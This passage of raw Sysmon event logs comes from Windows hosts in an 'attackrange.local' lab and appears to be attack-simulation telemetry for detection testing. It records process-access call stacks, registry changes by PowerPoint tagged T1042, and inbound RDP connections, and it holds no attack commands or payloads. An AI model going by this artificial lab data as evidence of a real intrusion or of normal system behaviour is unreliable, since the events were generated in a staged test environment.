eprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000080434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.310{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.310{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.232{A7A01FEF-C0A6-607E-7705-00000000BB01}43483520C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000080431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.232{A7A01FEF-C0A6-607E-7705-00000000BB01}43483520C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000080430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.232{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000080429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.232{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000080428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.232{A7A01FEF-C0A6-607E-8105-00000000BB01}8362600C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.232{A7A01FEF-C0A6-607E-8105-00000000BB01}8362600C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.232{A7A01FEF-C0A6-607E-8105-00000000BB01}8363768C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.232{A7A01FEF-C0A6-607E-8105-00000000BB01}8363768C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.232{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.232{A7A01FEF-C0A6-607E-8105-00000000BB01}8362600C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.232{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.232{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000050571Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:38.467{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52539-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x800000000000000050570Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:38.415{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60213-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050569Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:37.473{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57278-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050568Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:40.169{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6C3603405CC95BD4D4417E70A722A3F,SHA256=C31B2DEF1C40ED3217003622E108E48919E29F4BB5650CA54C072F6639FEC9A4,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000080510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:58:41.982{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\ocsmeet_auto_file\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\lync.exe" "%%1" 13241300x800000000000000080509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:58:41.982{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\ocsmeet_auto_file\shell\edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\lync.exe" "%%1" 13241300x800000000000000080508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-04-20 14:58:41.982{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\FriendlyNameMicrosoft Power View for Excel 13241300x800000000000000080507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-04-20 14:58:41.966{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\FriendlyNameMicrosoft Power Pivot for Excel 10341000x800000000000000080506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.966{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+194dd|C:\Windows\System32\SHELL32.dll+61df0|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.966{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.966{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.935{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.935{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.935{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC21-607E-A10E-00000000BB01}6232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.919{A7A01FEF-B626-607E-1600-00000000BB01}15402648C:\Windows\system32\svchost.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.919{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.919{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC21-607E-A10E-00000000BB01}6232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.919{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC21-607E-A10E-00000000BB01}6232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\W